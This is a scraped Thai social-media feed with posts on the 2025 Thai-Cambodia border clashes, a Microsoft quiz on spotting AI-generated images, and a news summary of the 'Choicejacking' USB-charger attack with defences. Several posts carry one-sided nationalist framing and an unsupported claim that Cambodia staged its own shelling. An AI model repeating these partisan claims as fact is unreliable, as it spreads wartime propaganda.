    1 ความคิดเห็น 0 การแบ่งปัน 685 มุมมอง 0 รีวิว
  • ไม่มีใครอีกแล้วที่จะมารักกัน เท่าคนไทยด้วยกัน

    “คนไทยเราเป็นคนกล้าหาญ เป็นคนอดทนเชื่อว่าไม่แพ้ชาติอื่นแน่ ๆ ที่มาคราวนี้ พี่ก็อยากจะบอกให้ทุกคนทราบว่าพระเจ้าอยู่หัวทรงฝากมาคิดถึงทุกคนด้วยที่นี้ พี่ก็มีของเล็กๆ น้อยๆ มาฝาก แล้วก็ถ้ามีอะไรที่เหลือบ่ากว่าแรงก็ให้ท่านผู้ว่าติดต่อมาได้ เพราะว่าพี่ก็ต้องการจะช่วยเหลือประเทศไทย คนไทยด้วยกันขอให้จำไว้อย่างหนึ่งว่า คนไทยด้วยกันขอให้รักกัน ไม่มีใครอีกแล้วที่จะมารักกันเท่าคนไทยด้วยกัน พี่ขออวยพรให้ทั้งพี่ ทั้งน้อง ทั้งเด็ก ๆ ณ ที่นี้ปลอดภัยจากภยันตรายทั้งปวง แล้วก็หวังว่าเหตุการณ์ที่ร้าย ๆ จะผ่านไป และพวกเราจะได้อยู่กันอย่างสงบสุขอีกครั้งหนึ่ง”

    พระดำรัส สมเด็จพระเจ้าน้องนางเธอ เจ้าฟ้าจุฬาภรณวลัยลักษณ์ อัครราชกุมารี กรมพระศรีสวางวัฒน วรขัตติยราชนารี ในโอกาสเสด็จไปทรงเยี่ยมประชาชน และหน่วยแพทย์พระราชทาน โรงพยาบาลจุฬาภรณ์ ที่ศูนย์พักพิงชั่วคราว ในพื้นที่จังหวัดชายแดนไทย-กัมพูชา เมื่อวันที่ 30 ก.ค. ถือเป็นสิ่งเตือนใจประชาชนคนไทย ผู้รักชาติรักแผ่นดินในยามนี้

    สถานการณ์การปะทะกันระหว่างไทย-กัมพูชา นำมาซึ่งความสูญเสียของประชาชนผู้บริสุทธิ์ 15 ราย ทหารไทยเสียสละเลือดเนื้อและชีวิตอีก 15 นาย ความเสียหายทั้งโรงพยาบาล โรงเรียน บ้านเรือนราษฎรและทรัพย์สินเสียหายอีกจำนวนมาก แม้สงบศึกจากข้อตกลงหยุดยิงนับตั้งแต่หลังเที่ยงคืนวันที่ 29 ก.ค. แต่สิ่งที่คนไทยผู้รักชาติต้องรับมือคือการแทรกแซงจากต่างชาติ

    กัมพูชาเดินเกมเชิงรุกกับต่างชาติ พาทูตทหาร ทูตประเทศต่างๆ และสื่อต่างประเทศลงพื้นที่ชายแดน พยายามใช้ความสงสารในฐานะประเทศที่มีขนาดเศรษฐกิจเล็กกว่าไทย ดึงชาติต่างๆ เข้ามาเป็นพวก ขณะที่มาเลเซียที่แสดงบทบาทเป็นคนกลาง ซึ่งมีสหรัฐอเมริกาสนับสนุน ตั้งเงื่อนไขว่าถ้าไม่หยุดยิงจะไม่เจรจาภาษี ส่งทูตทหารประจำกัมพูชาและทูตทหารประจำประเทศไทยเป็นผู้สังเกตการณ์จากมาตรการหยุดยิง เท่ากับว่าไทยกำลังถูกจับตามองอย่างโดดเดี่ยว

    ในขณะที่ประเทศไทย ที่แม้สงครามด้วยอาวุธสงบลง ยังต้องเจอปฎิบัติการข้อมูลข่าวสารที่เต็มไปด้วยข่าวปลอม และสงครามไซเบอร์เข้าโจมตี นักการเมืองคือตัวปัญหาของแผ่นดินอย่างแท้จริง ไม่ว่าจะเป็นฝ่ายรัฐบาลที่นิ่งเฉยกับสถานการณ์เหมือนรู้เห็นเป็นใจอีกฝ่าย และฝ่ายค้านที่ด่าว่ากองทัพส้นตีน ไม่เหลือใครแล้วแม้แต่คนที่ได้ชื่อว่าเป็นผู้แทนราษฎรให้พึ่งพา กินภาษีประชาชน แต่เลือกเฉพาะประชาชนที่เลือกเขาเขามา คนที่เลือกแบบนี้ ถึงได้ สส.แบบนี้

    ไม่มีใครอีกแล้วที่จะรักกัน เท่ากับคนไทยผู้รักชาติรักแผ่นดินด้วยกัน จนกว่าจะมีความชัดเจนทางการเมืองจากศาลรัฐธรรมนูญ

    #Newskit
    ไม่มีใครอีกแล้วที่จะมารักกัน เท่าคนไทยด้วยกัน “คนไทยเราเป็นคนกล้าหาญ เป็นคนอดทนเชื่อว่าไม่แพ้ชาติอื่นแน่ ๆ ที่มาคราวนี้ พี่ก็อยากจะบอกให้ทุกคนทราบว่าพระเจ้าอยู่หัวทรงฝากมาคิดถึงทุกคนด้วยที่นี้ พี่ก็มีของเล็กๆ น้อยๆ มาฝาก แล้วก็ถ้ามีอะไรที่เหลือบ่ากว่าแรงก็ให้ท่านผู้ว่าติดต่อมาได้ เพราะว่าพี่ก็ต้องการจะช่วยเหลือประเทศไทย คนไทยด้วยกันขอให้จำไว้อย่างหนึ่งว่า คนไทยด้วยกันขอให้รักกัน ไม่มีใครอีกแล้วที่จะมารักกันเท่าคนไทยด้วยกัน พี่ขออวยพรให้ทั้งพี่ ทั้งน้อง ทั้งเด็ก ๆ ณ ที่นี้ปลอดภัยจากภยันตรายทั้งปวง แล้วก็หวังว่าเหตุการณ์ที่ร้าย ๆ จะผ่านไป และพวกเราจะได้อยู่กันอย่างสงบสุขอีกครั้งหนึ่ง” พระดำรัส สมเด็จพระเจ้าน้องนางเธอ เจ้าฟ้าจุฬาภรณวลัยลักษณ์ อัครราชกุมารี กรมพระศรีสวางวัฒน วรขัตติยราชนารี ในโอกาสเสด็จไปทรงเยี่ยมประชาชน และหน่วยแพทย์พระราชทาน โรงพยาบาลจุฬาภรณ์ ที่ศูนย์พักพิงชั่วคราว ในพื้นที่จังหวัดชายแดนไทย-กัมพูชา เมื่อวันที่ 30 ก.ค. ถือเป็นสิ่งเตือนใจประชาชนคนไทย ผู้รักชาติรักแผ่นดินในยามนี้ สถานการณ์การปะทะกันระหว่างไทย-กัมพูชา นำมาซึ่งความสูญเสียของประชาชนผู้บริสุทธิ์ 15 ราย ทหารไทยเสียสละเลือดเนื้อและชีวิตอีก 15 นาย ความเสียหายทั้งโรงพยาบาล โรงเรียน บ้านเรือนราษฎรและทรัพย์สินเสียหายอีกจำนวนมาก แม้สงบศึกจากข้อตกลงหยุดยิงนับตั้งแต่หลังเที่ยงคืนวันที่ 29 ก.ค. แต่สิ่งที่คนไทยผู้รักชาติต้องรับมือคือการแทรกแซงจากต่างชาติ กัมพูชาเดินเกมเชิงรุกกับต่างชาติ พาทูตทหาร ทูตประเทศต่างๆ และสื่อต่างประเทศลงพื้นที่ชายแดน พยายามใช้ความสงสารในฐานะประเทศที่มีขนาดเศรษฐกิจเล็กกว่าไทย ดึงชาติต่างๆ เข้ามาเป็นพวก ขณะที่มาเลเซียที่แสดงบทบาทเป็นคนกลาง ซึ่งมีสหรัฐอเมริกาสนับสนุน ตั้งเงื่อนไขว่าถ้าไม่หยุดยิงจะไม่เจรจาภาษี ส่งทูตทหารประจำกัมพูชาและทูตทหารประจำประเทศไทยเป็นผู้สังเกตการณ์จากมาตรการหยุดยิง เท่ากับว่าไทยกำลังถูกจับตามองอย่างโดดเดี่ยว ในขณะที่ประเทศไทย ที่แม้สงครามด้วยอาวุธสงบลง ยังต้องเจอปฎิบัติการข้อมูลข่าวสารที่เต็มไปด้วยข่าวปลอม และสงครามไซเบอร์เข้าโจมตี นักการเมืองคือตัวปัญหาของแผ่นดินอย่างแท้จริง ไม่ว่าจะเป็นฝ่ายรัฐบาลที่นิ่งเฉยกับสถานการณ์เหมือนรู้เห็นเป็นใจอีกฝ่าย และฝ่ายค้านที่ด่าว่ากองทัพส้นตีน ไม่เหลือใครแล้วแม้แต่คนที่ได้ชื่อว่าเป็นผู้แทนราษฎรให้พึ่งพา กินภาษีประชาชน แต่เลือกเฉพาะประชาชนที่เลือกเขาเขามา คนที่เลือกแบบนี้ ถึงได้ สส.แบบนี้ ไม่มีใครอีกแล้วที่จะรักกัน เท่ากับคนไทยผู้รักชาติรักแผ่นดินด้วยกัน จนกว่าจะมีความชัดเจนทางการเมืองจากศาลรัฐธรรมนูญ #Newskit
    Like
    3
    0 ความคิดเห็น 0 การแบ่งปัน 185 มุมมอง 0 รีวิว
  • พลตรี วินธัย สุวารี โฆษกกองทัพบก อ่านแถลงการณ์ประณามกัมพูชาละเมิดข้อตกลงหยุดยิง เผย 3 พื้นที่ 1.คานม้า กัมพูชาใช้ปืนเล็กยิงใส่แนวกำลังฝ่ายไทย 2.เขาพระวิหาร บริเวณภูมะเขือ กัมพูชาใช้อาวุธปืนเล็ก ยิงอย่างต่อเนื่อง ใช้เครื่องยิงลูกระเบิด ฝ่ายไทยจำเป็นต้องตอบโต้ ป้องกันตนเอง และ 3.ผามออีแดง ตรวจพบ​การยิงเครื่องยิงลูกระเบิด จากฝั่งกัมพูชาเข้ามาในเขตไทยชัดเจน เป็นการละเมิดข้อตกลงหยุดยิงอย่างร้ายแรง ครั้งที่ 2 สะท้อนพฤติกรรมบ่อนทำลายความพยายามคลี่คลายสถานการณ์​โดยสันติวิธี ฝ่ายไทยจะอดทนอดกลั้น และจะดำเนินการตามขั้นตอนที่เหมาะสมจำเป็นอย่างเด็ดขาด เพื่อปกป้องอธิปไตยและความปลอดภัยของประชาชนไทยโดยไม่ละเว้น​ โดยยึดหลักสันติภาพและมนุษยธรรมสูงสุด

    -พบโดรนผิดปกติถึง กทม.
    -กัมพูชายังเพิ่มกำลัง
    -IO เขมรรัวยิงข่าวปลอม
    -สภาไว้อาลัยผู้เสียชีวิต
    พลตรี วินธัย สุวารี โฆษกกองทัพบก อ่านแถลงการณ์ประณามกัมพูชาละเมิดข้อตกลงหยุดยิง เผย 3 พื้นที่ 1.คานม้า กัมพูชาใช้ปืนเล็กยิงใส่แนวกำลังฝ่ายไทย 2.เขาพระวิหาร บริเวณภูมะเขือ กัมพูชาใช้อาวุธปืนเล็ก ยิงอย่างต่อเนื่อง ใช้เครื่องยิงลูกระเบิด ฝ่ายไทยจำเป็นต้องตอบโต้ ป้องกันตนเอง และ 3.ผามออีแดง ตรวจพบ​การยิงเครื่องยิงลูกระเบิด จากฝั่งกัมพูชาเข้ามาในเขตไทยชัดเจน เป็นการละเมิดข้อตกลงหยุดยิงอย่างร้ายแรง ครั้งที่ 2 สะท้อนพฤติกรรมบ่อนทำลายความพยายามคลี่คลายสถานการณ์​โดยสันติวิธี ฝ่ายไทยจะอดทนอดกลั้น และจะดำเนินการตามขั้นตอนที่เหมาะสมจำเป็นอย่างเด็ดขาด เพื่อปกป้องอธิปไตยและความปลอดภัยของประชาชนไทยโดยไม่ละเว้น​ โดยยึดหลักสันติภาพและมนุษยธรรมสูงสุด -พบโดรนผิดปกติถึง กทม. -กัมพูชายังเพิ่มกำลัง -IO เขมรรัวยิงข่าวปลอม -สภาไว้อาลัยผู้เสียชีวิต
    Like
    2
    0 ความคิดเห็น 0 การแบ่งปัน 293 มุมมอง 0 0 รีวิว
  • Senior reporter: Cambodia staged An Ma — shelled it before showing attachés.
    [ยุทธิยงยืนยัน ช่องอานม้าถูกจัดฉาก เขมรถล่มเองเมื่อคืน ก่อนพาทูตทหารไปดู] [30/7/68]

    #ช่องอานม้าถูกจัดฉาก #เขมรถล่มเอง #IOเขมร #พาทูตดูของปลอม #CambodiaStagedAnMa #FakeBattlefield #MilitaryDeception #ข่าวความมั่นคง #ข่าวร้อนชายแดน #ข่าววันนี้
    #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire #CambodiaNoCeasefire #TruthFromThailand #Hunsenfiredfirst #thaitimes #news1 #shorts
    Senior reporter: Cambodia staged An Ma — shelled it before showing attachés. [ยุทธิยงยืนยัน ช่องอานม้าถูกจัดฉาก เขมรถล่มเองเมื่อคืน ก่อนพาทูตทหารไปดู] [30/7/68] #ช่องอานม้าถูกจัดฉาก #เขมรถล่มเอง #IOเขมร #พาทูตดูของปลอม #CambodiaStagedAnMa #FakeBattlefield #MilitaryDeception #ข่าวความมั่นคง #ข่าวร้อนชายแดน #ข่าววันนี้ #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire #CambodiaNoCeasefire #TruthFromThailand #Hunsenfiredfirst #thaitimes #news1 #shorts
    0 ความคิดเห็น 0 การแบ่งปัน 157 มุมมอง 0 0 รีวิว
  • เรื่องเล่าจากภาพลวงตา: เมื่อภาพถ่ายกลายเป็นสนามรบของความจริง
    Microsoft ได้เปิดตัวเว็บไซต์เกม “Real or Not” ที่ให้ผู้ใช้ทดสอบความสามารถในการแยกแยะภาพจริงกับภาพที่สร้างโดย AI โดยใช้ภาพจากคลังภาพถ่ายและโมเดล AI หลายตัว เช่น Flux Pro และ GAN deepfakes

    จากการศึกษาภาพกว่า 287,000 ภาพ โดยผู้เข้าร่วม 12,500 คนทั่วโลก พบว่า:
    - คนทั่วไปสามารถแยกแยะภาพจริงจากภาพปลอมได้ถูกต้องเพียง 63%
    - ภาพที่สร้างโดย GAN ซึ่งเน้นเฉพาะใบหน้าหรือใช้เทคนิค inpainting หลอกผู้ชมได้ถึง 55%
    - ภาพจริงบางภาพกลับถูกเข้าใจผิดว่าเป็นภาพปลอม โดยเฉพาะภาพที่มีแสง สี หรือมุมกล้องแปลกตา เช่น ภาพทหารในสถานการณ์พิเศษ

    Microsoft ยังเผยว่าเครื่องมือตรวจจับภาพปลอมที่กำลังพัฒนาอยู่สามารถแยกแยะได้แม่นยำถึง 95% ซึ่งเหนือกว่าความสามารถของมนุษย์อย่างชัดเจน

    Microsoft เปิดตัวเว็บไซต์ “Real or Not” เพื่อทดสอบการแยกแยะภาพจริงกับภาพที่สร้างโดย AI
    ใช้ภาพจากคลังภาพถ่ายและโมเดล AI เช่น Flux Pro และ GAN deepfakes
    ผู้ใช้ต้องเลือกว่าภาพที่เห็นเป็นของจริงหรือของปลอม

    ผลการศึกษาจากภาพ 287,000 ภาพ โดยผู้เข้าร่วม 12,500 คนทั่วโลก
    ผู้ใช้สามารถแยกแยะภาพได้ถูกต้องเฉลี่ย 63%
    ภาพใบหน้าที่สร้างโดย GAN หลอกผู้ชมได้ถึง 55%

    ภาพจริงบางภาพกลับถูกเข้าใจผิดว่าเป็นภาพปลอม
    เช่น ภาพทหารในสถานการณ์แสงและสีแปลกตา
    แสดงให้เห็นว่าความแปลกของภาพจริงอาจทำให้คนสงสัยว่าเป็นภาพปลอม

    AI ที่ Microsoft กำลังพัฒนาสามารถตรวจจับภาพปลอมได้แม่นยำถึง 95%
    ใช้เทคนิคการวิเคราะห์ระดับพิกเซลและความถี่ของภาพ
    มีความแม่นยำสูงกว่าการตัดสินใจของมนุษย์

    Flux Pro AI สามารถสร้างภาพที่ดูเหมือนถ่ายจากมือถือทั่วไปได้
    ลดความเรียบเนียนเกินจริงของภาพ AI แบบเดิม
    ทำให้ภาพปลอมดูเหมือนภาพจริงในชีวิตประจำวันมากขึ้น

    ภาพที่สร้างโดย AI มีความสมจริงมากขึ้นจนยากต่อการตรวจจับด้วยสายตา
    ผู้ใช้ทั่วไปอาจถูกหลอกโดยภาพที่ดูเหมือนภาพถ่ายจริง
    ส่งผลต่อความน่าเชื่อถือของข้อมูลภาพในสื่อสังคมและข่าวสาร

    ภาพจริงที่มีองค์ประกอบแปลกตาอาจถูกเข้าใจผิดว่าเป็นภาพปลอม
    เช่น ภาพที่มีแสงผิดธรรมชาติหรือมุมกล้องไม่คุ้นเคย
    อาจทำให้เกิดการปฏิเสธข้อมูลที่เป็นความจริง

    การใช้ภาพปลอมเพื่อสร้างความเข้าใจผิดอาจนำไปสู่การเผยแพร่ข้อมูลเท็จ
    โดยเฉพาะในบริบททางการเมืองหรือข่าวปลอม
    เสี่ยงต่อการบิดเบือนความคิดเห็นสาธารณะ

    การพัฒนา AI ที่ตรวจจับภาพปลอมยังต้องการการปรับปรุงเพื่อรองรับโมเดลใหม่ๆ
    โมเดล GAN ใหม่ๆ อาจหลบเลี่ยงการตรวจจับได้
    ต้องมีการอัปเดตระบบตรวจจับเป็นประจำ

    https://www.techspot.com/news/108862-think-you-can-tell-fake-image-real-one.html
    🧠 เรื่องเล่าจากภาพลวงตา: เมื่อภาพถ่ายกลายเป็นสนามรบของความจริง Microsoft ได้เปิดตัวเว็บไซต์เกม “Real or Not” ที่ให้ผู้ใช้ทดสอบความสามารถในการแยกแยะภาพจริงกับภาพที่สร้างโดย AI โดยใช้ภาพจากคลังภาพถ่ายและโมเดล AI หลายตัว เช่น Flux Pro และ GAN deepfakes จากการศึกษาภาพกว่า 287,000 ภาพ โดยผู้เข้าร่วม 12,500 คนทั่วโลก พบว่า: - คนทั่วไปสามารถแยกแยะภาพจริงจากภาพปลอมได้ถูกต้องเพียง 63% - ภาพที่สร้างโดย GAN ซึ่งเน้นเฉพาะใบหน้าหรือใช้เทคนิค inpainting หลอกผู้ชมได้ถึง 55% - ภาพจริงบางภาพกลับถูกเข้าใจผิดว่าเป็นภาพปลอม โดยเฉพาะภาพที่มีแสง สี หรือมุมกล้องแปลกตา เช่น ภาพทหารในสถานการณ์พิเศษ Microsoft ยังเผยว่าเครื่องมือตรวจจับภาพปลอมที่กำลังพัฒนาอยู่สามารถแยกแยะได้แม่นยำถึง 95% ซึ่งเหนือกว่าความสามารถของมนุษย์อย่างชัดเจน ✅ Microsoft เปิดตัวเว็บไซต์ “Real or Not” เพื่อทดสอบการแยกแยะภาพจริงกับภาพที่สร้างโดย AI ➡️ ใช้ภาพจากคลังภาพถ่ายและโมเดล AI เช่น Flux Pro และ GAN deepfakes ➡️ ผู้ใช้ต้องเลือกว่าภาพที่เห็นเป็นของจริงหรือของปลอม ✅ ผลการศึกษาจากภาพ 287,000 ภาพ โดยผู้เข้าร่วม 12,500 คนทั่วโลก ➡️ ผู้ใช้สามารถแยกแยะภาพได้ถูกต้องเฉลี่ย 63% ➡️ ภาพใบหน้าที่สร้างโดย GAN หลอกผู้ชมได้ถึง 55% ✅ ภาพจริงบางภาพกลับถูกเข้าใจผิดว่าเป็นภาพปลอม ➡️ เช่น ภาพทหารในสถานการณ์แสงและสีแปลกตา ➡️ แสดงให้เห็นว่าความแปลกของภาพจริงอาจทำให้คนสงสัยว่าเป็นภาพปลอม ✅ AI ที่ Microsoft กำลังพัฒนาสามารถตรวจจับภาพปลอมได้แม่นยำถึง 95% ➡️ ใช้เทคนิคการวิเคราะห์ระดับพิกเซลและความถี่ของภาพ ➡️ มีความแม่นยำสูงกว่าการตัดสินใจของมนุษย์ ✅ Flux Pro AI สามารถสร้างภาพที่ดูเหมือนถ่ายจากมือถือทั่วไปได้ ➡️ ลดความเรียบเนียนเกินจริงของภาพ AI แบบเดิม ➡️ ทำให้ภาพปลอมดูเหมือนภาพจริงในชีวิตประจำวันมากขึ้น ‼️ ภาพที่สร้างโดย AI มีความสมจริงมากขึ้นจนยากต่อการตรวจจับด้วยสายตา ⛔ ผู้ใช้ทั่วไปอาจถูกหลอกโดยภาพที่ดูเหมือนภาพถ่ายจริง ⛔ ส่งผลต่อความน่าเชื่อถือของข้อมูลภาพในสื่อสังคมและข่าวสาร ‼️ ภาพจริงที่มีองค์ประกอบแปลกตาอาจถูกเข้าใจผิดว่าเป็นภาพปลอม ⛔ เช่น ภาพที่มีแสงผิดธรรมชาติหรือมุมกล้องไม่คุ้นเคย ⛔ อาจทำให้เกิดการปฏิเสธข้อมูลที่เป็นความจริง ‼️ การใช้ภาพปลอมเพื่อสร้างความเข้าใจผิดอาจนำไปสู่การเผยแพร่ข้อมูลเท็จ ⛔ โดยเฉพาะในบริบททางการเมืองหรือข่าวปลอม ⛔ เสี่ยงต่อการบิดเบือนความคิดเห็นสาธารณะ ‼️ การพัฒนา AI ที่ตรวจจับภาพปลอมยังต้องการการปรับปรุงเพื่อรองรับโมเดลใหม่ๆ ⛔ โมเดล GAN ใหม่ๆ อาจหลบเลี่ยงการตรวจจับได้ ⛔ ต้องมีการอัปเดตระบบตรวจจับเป็นประจำ https://www.techspot.com/news/108862-think-you-can-tell-fake-image-real-one.html
    WWW.TECHSPOT.COM
    Think you can tell a fake image from a real one? Microsoft's quiz will test you
    The study found that humans can accurately distinguish real photos from AI-generated ones about 63% of the time. In contrast, Microsoft's in-development AI detection tool reportedly achieves...
    0 ความคิดเห็น 0 การแบ่งปัน 98 มุมมอง 0 รีวิว
  • เรื่องเล่าจากพอร์ตชาร์จ: เมื่อการเสียบสายกลายเป็นการเปิดประตูให้แฮกเกอร์

    ย้อนกลับไปเมื่อสิบปีก่อน โลกเคยตื่นตัวกับภัย “Juice Jacking” ที่ใช้พอร์ต USB สาธารณะในการติดตั้งมัลแวร์หรือขโมยข้อมูลจากมือถือที่เสียบชาร์จ ทำให้ผู้ผลิตระบบปฏิบัติการมือถืออย่าง Apple และ Google ต้องออกมาตรการป้องกัน เช่น การให้ผู้ใช้เลือก “Charge only” หรือ “Transfer files” ทุกครั้งที่เสียบสาย

    แต่ในปี 2025 นักวิจัยจาก Graz University of Technology ประเทศออสเตรีย ได้เปิดเผยเทคนิคใหม่ชื่อว่า Choicejacking ซึ่งสามารถหลอกให้มือถืออนุญาตการเชื่อมต่อข้อมูลโดยที่ผู้ใช้ไม่รู้ตัวเลยแม้แต่นิดเดียว

    Choicejacking ไม่ใช่มัลแวร์แบบเดิม แต่ใช้การจำลองอุปกรณ์ USB หรือ Bluetooth เช่น คีย์บอร์ด เพื่อส่งคำสั่งปลอมไปยังมือถือให้ตอบตกลงกับหน้าต่างแจ้งเตือนการเชื่อมต่อข้อมูล โดยใช้เวลาเพียง 133 มิลลิวินาที—เร็วกว่าการกระพริบตา!

    Choicejacking เป็นเทคนิคใหม่ที่สามารถหลอกมือถือให้อนุญาตการเชื่อมต่อข้อมูลโดยไม่ต้องแตะหน้าจอ
    ใช้การจำลองอุปกรณ์ USB หรือ Bluetooth เพื่อส่งคำสั่งปลอม
    ใช้เวลาเพียง 133 มิลลิวินาทีในการดำเนินการ

    นักวิจัยจาก Graz University of Technology เป็นผู้ค้นพบและนำเสนอที่งาน USENIX Security Symposium 2025
    เป็นการพัฒนาต่อจาก Juice Jacking ที่เคยเป็นภัยใหญ่เมื่อสิบปีก่อน
    ได้รับการยอมรับจากผู้ผลิตมือถือรายใหญ่ เช่น Apple, Google, Samsung, Xiaomi

    Choicejacking สามารถเข้าถึงข้อมูลส่วนตัว เช่น รูปภาพ, เอกสาร, ข้อมูลแอปพลิเคชัน
    ทดสอบกับมือถือจาก 8 ผู้ผลิตหลัก และพบว่าทุกเครื่องมีช่องโหว่
    บางรุ่นสามารถขโมยข้อมูลได้แม้หน้าจอจะล็อกอยู่

    มีการใช้เทคนิคเสริม เช่น การตรวจจับช่วงเวลาที่ผู้ใช้ไม่สังเกตหน้าจอผ่านสายไฟ (power line side-channel)
    ใช้ช่วงที่ผู้ใช้กำลังโทรศัพท์หรือดูวิดีโอเพื่อหลบเลี่ยงการตรวจจับ
    เพิ่มความแนบเนียนในการโจมตี

    ผู้ผลิตระบบปฏิบัติการเริ่มออกแพตช์เพื่อป้องกัน Choicejacking
    iOS 18.4 และ Android 15 เพิ่มการยืนยันตัวตนก่อนอนุญาตการเชื่อมต่อ USB
    แต่บางรุ่น เช่น Samsung ที่ใช้ One UI 7 ยังไม่มีการบังคับใช้การยืนยัน

    การใช้พอร์ต USB สาธารณะ เช่น ที่สนามบิน, โรงแรม, ร้านกาแฟ อาจเสี่ยงต่อการถูกโจมตี
    แม้จะดูปลอดภัย แต่พอร์ตอาจถูกดัดแปลงให้เป็นอุปกรณ์โจมตี
    การเสียบสายโดยไม่ระวังอาจเปิดช่องให้แฮกเกอร์เข้าถึงข้อมูลได้ทันที

    การโจมตีสามารถเกิดขึ้นได้แม้ผู้ใช้ไม่ได้แตะหน้าจอเลย
    ใช้การจำลองคีย์บอร์ดหรืออุปกรณ์ Bluetooth เพื่อส่งคำสั่งปลอม
    ผู้ใช้ไม่มีโอกาสเห็นหรือยกเลิกการอนุญาต

    มือถือบางรุ่นยังไม่มีการบังคับให้ยืนยันตัวตนก่อนอนุญาตการเชื่อมต่อข้อมูล
    แม้จะอัปเดตเป็น Android 15 แล้ว แต่บางแบรนด์ยังไม่เปิดใช้ฟีเจอร์นี้
    ทำให้ผู้ใช้ยังเสี่ยงต่อการถูกโจมตี Choicejacking

    อุปกรณ์ป้องกันแบบเดิม เช่น USB data blocker อาจไม่เพียงพออีกต่อไป
    Choicejacking ใช้ช่องทางใหม่ที่ไม่ถูกบล็อกโดยอุปกรณ์เหล่านี้
    ต้องใช้มาตรการเสริม เช่น สายชาร์จแบบ “charge-only” หรือ power bank ส่วนตัว

    https://hackread.com/choicejacking-attack-steals-data-phones-public-chargers/
    🔌 เรื่องเล่าจากพอร์ตชาร์จ: เมื่อการเสียบสายกลายเป็นการเปิดประตูให้แฮกเกอร์ ย้อนกลับไปเมื่อสิบปีก่อน โลกเคยตื่นตัวกับภัย “Juice Jacking” ที่ใช้พอร์ต USB สาธารณะในการติดตั้งมัลแวร์หรือขโมยข้อมูลจากมือถือที่เสียบชาร์จ ทำให้ผู้ผลิตระบบปฏิบัติการมือถืออย่าง Apple และ Google ต้องออกมาตรการป้องกัน เช่น การให้ผู้ใช้เลือก “Charge only” หรือ “Transfer files” ทุกครั้งที่เสียบสาย แต่ในปี 2025 นักวิจัยจาก Graz University of Technology ประเทศออสเตรีย ได้เปิดเผยเทคนิคใหม่ชื่อว่า Choicejacking ซึ่งสามารถหลอกให้มือถืออนุญาตการเชื่อมต่อข้อมูลโดยที่ผู้ใช้ไม่รู้ตัวเลยแม้แต่นิดเดียว Choicejacking ไม่ใช่มัลแวร์แบบเดิม แต่ใช้การจำลองอุปกรณ์ USB หรือ Bluetooth เช่น คีย์บอร์ด เพื่อส่งคำสั่งปลอมไปยังมือถือให้ตอบตกลงกับหน้าต่างแจ้งเตือนการเชื่อมต่อข้อมูล โดยใช้เวลาเพียง 133 มิลลิวินาที—เร็วกว่าการกระพริบตา! ✅ Choicejacking เป็นเทคนิคใหม่ที่สามารถหลอกมือถือให้อนุญาตการเชื่อมต่อข้อมูลโดยไม่ต้องแตะหน้าจอ ➡️ ใช้การจำลองอุปกรณ์ USB หรือ Bluetooth เพื่อส่งคำสั่งปลอม ➡️ ใช้เวลาเพียง 133 มิลลิวินาทีในการดำเนินการ ✅ นักวิจัยจาก Graz University of Technology เป็นผู้ค้นพบและนำเสนอที่งาน USENIX Security Symposium 2025 ➡️ เป็นการพัฒนาต่อจาก Juice Jacking ที่เคยเป็นภัยใหญ่เมื่อสิบปีก่อน ➡️ ได้รับการยอมรับจากผู้ผลิตมือถือรายใหญ่ เช่น Apple, Google, Samsung, Xiaomi ✅ Choicejacking สามารถเข้าถึงข้อมูลส่วนตัว เช่น รูปภาพ, เอกสาร, ข้อมูลแอปพลิเคชัน ➡️ ทดสอบกับมือถือจาก 8 ผู้ผลิตหลัก และพบว่าทุกเครื่องมีช่องโหว่ ➡️ บางรุ่นสามารถขโมยข้อมูลได้แม้หน้าจอจะล็อกอยู่ ✅ มีการใช้เทคนิคเสริม เช่น การตรวจจับช่วงเวลาที่ผู้ใช้ไม่สังเกตหน้าจอผ่านสายไฟ (power line side-channel) ➡️ ใช้ช่วงที่ผู้ใช้กำลังโทรศัพท์หรือดูวิดีโอเพื่อหลบเลี่ยงการตรวจจับ ➡️ เพิ่มความแนบเนียนในการโจมตี ✅ ผู้ผลิตระบบปฏิบัติการเริ่มออกแพตช์เพื่อป้องกัน Choicejacking ➡️ iOS 18.4 และ Android 15 เพิ่มการยืนยันตัวตนก่อนอนุญาตการเชื่อมต่อ USB ➡️ แต่บางรุ่น เช่น Samsung ที่ใช้ One UI 7 ยังไม่มีการบังคับใช้การยืนยัน ‼️ การใช้พอร์ต USB สาธารณะ เช่น ที่สนามบิน, โรงแรม, ร้านกาแฟ อาจเสี่ยงต่อการถูกโจมตี ⛔ แม้จะดูปลอดภัย แต่พอร์ตอาจถูกดัดแปลงให้เป็นอุปกรณ์โจมตี ⛔ การเสียบสายโดยไม่ระวังอาจเปิดช่องให้แฮกเกอร์เข้าถึงข้อมูลได้ทันที ‼️ การโจมตีสามารถเกิดขึ้นได้แม้ผู้ใช้ไม่ได้แตะหน้าจอเลย ⛔ ใช้การจำลองคีย์บอร์ดหรืออุปกรณ์ Bluetooth เพื่อส่งคำสั่งปลอม ⛔ ผู้ใช้ไม่มีโอกาสเห็นหรือยกเลิกการอนุญาต ‼️ มือถือบางรุ่นยังไม่มีการบังคับให้ยืนยันตัวตนก่อนอนุญาตการเชื่อมต่อข้อมูล ⛔ แม้จะอัปเดตเป็น Android 15 แล้ว แต่บางแบรนด์ยังไม่เปิดใช้ฟีเจอร์นี้ ⛔ ทำให้ผู้ใช้ยังเสี่ยงต่อการถูกโจมตี Choicejacking ‼️ อุปกรณ์ป้องกันแบบเดิม เช่น USB data blocker อาจไม่เพียงพออีกต่อไป ⛔ Choicejacking ใช้ช่องทางใหม่ที่ไม่ถูกบล็อกโดยอุปกรณ์เหล่านี้ ⛔ ต้องใช้มาตรการเสริม เช่น สายชาร์จแบบ “charge-only” หรือ power bank ส่วนตัว https://hackread.com/choicejacking-attack-steals-data-phones-public-chargers/
    HACKREAD.COM
    New Choicejacking Attack Steals Data from Phones via Public Chargers
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 ความคิดเห็น 0 การแบ่งปัน 151 มุมมอง 0 รีวิว
Pages Boosts